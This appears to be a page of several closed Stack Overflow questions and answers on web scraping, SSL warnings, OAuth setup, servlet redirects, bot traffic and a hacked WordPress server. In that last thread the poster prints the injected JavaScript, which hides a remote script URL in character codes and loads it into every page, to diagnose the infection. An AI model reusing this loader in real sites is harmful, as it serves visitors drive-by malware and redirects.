Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
I use mechanize to create a virtual browser
br = mechanize.Browser()
# set cookies
cookies = cookielib.LWPCookieJar()
br.set_cookiejar(cookies)
# browser settings (used to emulate a browser)
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_responses(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
br.open("http://www.whatsmyip.org/")
Although the website returm my ip, they give a notice
Please DO NOT program a bot to use this site to grab your IPs. It kills my server and thats not nice. Just get some cheap or free web hosting and make your own IP-only page to power your bot. Then you won't even have to parse any html, just load the IP directly - better for everyone!!
Why does the website know that?
Do I miss something in my code?
I tested your code, it all works fine.
Do you mean this part:
<!--
Please DO NOT program a bot to use this site to grab your IPs. It kills my server and thats not nice.
Just get some cheap or free web hosting and make your own IP-only page to power your bot.
Then you won't even have to parse any html, just load the IP directly - better for everyone!!
-->
If yes, than it's just comment tag, that is used just to remind users not to use the website with bots.
It doesn't "catch" you or anything. If you will go to the whatsmyip page and open the souse code you will see that it starts on the line 24 (even if you open it in the browser).
So all in all it's just a warning that wed-developers putter inside the HTML
Related
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 2 years ago.
Improve this question
I'm living my worse nightmare. I have an CentOS server, that is hosting 10s of WordPress website.
My clients notice that their websites are opening and after loading it is redirected to (fast.destinyfernandi.com) <---- Malware website.
I used ClamAV to detect the malware and clean them manually, without any success.
Here is the example of the Clamscan command result of one of the website:
----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)
But this site is still redirecting to that malware website.
Have anyone came across such an issue?
Please help.
==================================Solved:=============================
The code was injected to all js files
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
There are several ways how your web resource could be redirected to destinyfernandi.
database could be patched and your own ligitimate code does
redirect
some injected code in php or JS or html templates does
redirect either via window.location or meta or headers of response.
First discover what address you gets redirected to , whether it is destinyfernandi or some other URL.
I mean you could be redirected to some "invisible" URL1 and server which servicing URL1 would redirect browser further to destinyfernandi.
Once you discover what is the first hop (URL) in redirects you can search for bad URL in source code and database dump.
There is also a chance that first hop URL ( most likely destinyfernandi) is obfuscated in your code but lets hope it is not the case.
You can also add break point which fires on redirects which could help you to identify obfuscated piece of JS code:
window.addEventListener("beforeunload", function() { debugger; }, false)
Bassically it is what the question says, It is like my website it is not save for the clients. (I do not have online payments or somethig like that)
The thing is that this only happen sometimes, and it is not always in the same device, for example it could happen in my pc once a week and the rest of the time works just fine.
I have beeing reading and it could be a lot of causes, but in this way that it is sometime I thing it is really weird, my ssl expires in four day, but this problem has been happen for about two months (the site has been 1 year online).
When I call to external links (for javascript or css) I checked and it is always https.
I also read that could be the browser or the OS but this has happened in chrome, mozilla and IE as browser and Windows 10, windows 8, ubuntu (last version at this time), android 5.0.1 as SO and my web server is linux.
I do not know what other information it is relevant, I try to give all I read could be relevant in this case.
To get more details you can :
Click on the slashed https
Open the console (The security tabs and the network tabs could help you too)
What could cause it:
Unsecure (http) requests
Unsecure ciphers ( check it with ssllabs.com )
Forms with http target
Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 6 years ago.
Improve this question
I followed the directions on this page to set up my Mashery Survey Monkey account. I set my API key and secret options using their values on the app. I used my client ID, which I assume is my "display name" to set sm_client_id. I then used smlogin(), and was directed to a page with the following error:
SurveyMonkey
The authorization request failed:
Invalid client_id and/or redirect_uri
What else could I be doing wrong?
BTW, I tried this setting the app both as Public and Private. Same problem each time.
You should first create your app at https://developer.surveymonkey.com/apps
After creating your app, go to the settings section. From there you should use the Client ID/API Key from that page (located in the credentials section at the bottom) and the redirect URI from the top of the page (that you set yourself) and that should work.
You need to make sure your redirect URI is a page you host that will accept the code and exchange it for an access token. If you're just using this for yourself, and the SDK allows it, you can just use the access token provided from the credentials section.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
Improve this question
After receiving a post request in servlet, I have to do a redirection to another server and at the same time I have to pass an xml file in the redirection request.
For example, I have to do a redirection from my servlet to "http://www.abc.com" and pass an xml file in the request.
I tried the following, but it didn't work.
response.sendRedirect - it is creating only get requests, so not able to send xml
HttpClient or URLConnection - it is creating a new request, not doing the actual redirection
Intermediate jsp - forwarded the request to a intermediate jsp and did a submit from jsp.
It is sending the xml in parameter and not in InputStream
Please let me know how to achieve this.
A redirect (either HTTP or HTML) can only operate on a URL, rather than a form submission, which offers built in support for uploading files via the "multipart/form-data" form encoding, and so you would have to encode your file within the URL itself, which would severely limit you given that the lowest-common-denominator (Internet Explorer) URL maximum length is around 2000 characters. If your files are smaller than that, then you could encode your file as a URL query parameter. Otherwise, it's probably not possible, but I will stand corrected if others know of a way to achieve it.
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 11 years ago.
Improve this question
One of our site recently received a lots of attack which all seems similar. By chance, we have a error logging framework which send us error log email when something strange happen or an error raised on the server.
Here is what happen :
Error : The file '/(A(u76U7llazAEkAAAAZTJmYmE1NmMtZTE4YS00YzQ2LTlmYzItNGIxMzZjMzNjOTc4vkp-I-8cYbLrHx25-IfNdMvuKao1))/MostOfOurPublicPage.aspx' does not exist.
Request:
URL: http://Ourwebsite.com/(A(u76U7llazAEkAAAAZTJmYmE1NmMtZTE4YS00YzQ2LTlmYzItNGIxMzZjMzNjOTc4vkp-I-8cYbLrHx25-IfNdMvuKao1))/MostOfOurPublicPage.aspx
User Agent: Mozilla/5.0 (compatible; SiteBot/0.1; +http://www.sitebot.org/robot/)
Referrer:
Host: 213.186.122.2 (Ukraine)
SecuredConnection: False
User-agent shows SiteBot/0.1 but I'm preaty sure its not ... at least I never heard anything about sitebots doing things like that.
Question
So, anyone have any idea of what the heck is that and what can I do to prevent this things because it make our error logging framework sending us something like 100 error logs a day!
Note : I usualy talk french so sorry for my english.
This is just a search bot or crawler. Place a robots.txt file on your web server root (http://www.example.com/robots.txt) and put the text below in it.
user-agent: sitebot
disallow: /
That should keep it away.
Also the strange url it uses, is just a session cookie passed by a url string, instead of a cookie.
These types of issues seem to crop up from time to time. You probably don't want to fully suppress these types of errors as they can be helpful from time to time to determine bad links. What I have done in the past is filter out bot traffic.
either block the traffic at your firewall
filter the bot traffic.